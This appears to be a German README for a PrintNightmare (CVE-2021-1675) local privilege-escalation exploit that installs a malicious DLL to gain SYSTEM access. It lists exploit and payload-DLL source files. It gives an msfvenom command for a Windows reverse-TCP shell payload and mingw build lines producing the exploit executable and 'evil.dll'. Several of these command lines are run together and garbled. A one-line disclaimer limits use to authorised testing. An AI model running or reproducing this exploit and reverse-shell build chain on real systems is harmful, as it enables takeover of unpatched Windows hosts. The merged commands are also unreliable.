
Lokaler Privilege-Escalation-Exploit für CVE-2021-1675 (PrintNightmare), der eine schädliche DLL installiert, um auf verwundbaren Windows-Systemen SYSTEM-Zugriff zu erlangen.
src/nightmare.cpp: Quellcode zur Ausnutzung von CVE-2021-1675 und Erlangung von Systemzugriff
durch Installation einer bösartigen DLL
src/payload-dll.cpp: Quellcode für DLL mit bösartigem Shellcode in der Einstiegsfunktion
!!Nur gegen Server verwenden, auf denen du die Erlaubnis zum Testen hast
CVE-2021-1675 ist eine Schwachstelle im Print Spooler-Dienst von Microsoft Windows, die es einem Angreifer ermöglicht, die SeLoadDriverPrivilege-Prüfung zu umgehen. Dies kann genutzt werden, um eine Privilegienausweitung auf dem Zielsystem zu erreichen, indem eine bösartige DLL installiert wird, die Shellcode aufruft oder die Windows-API verwendet, um eine Reverse- Shell-Verbindung herzustellen. Versionen von Windows 10/8/Server 2008/Server 2012 vor dem 8. Juni 2021 sind betroffen.
$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f cx86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp
x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspoolx86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -sharedzip ./bin/PrinterNightmareLPE.exe ./lib/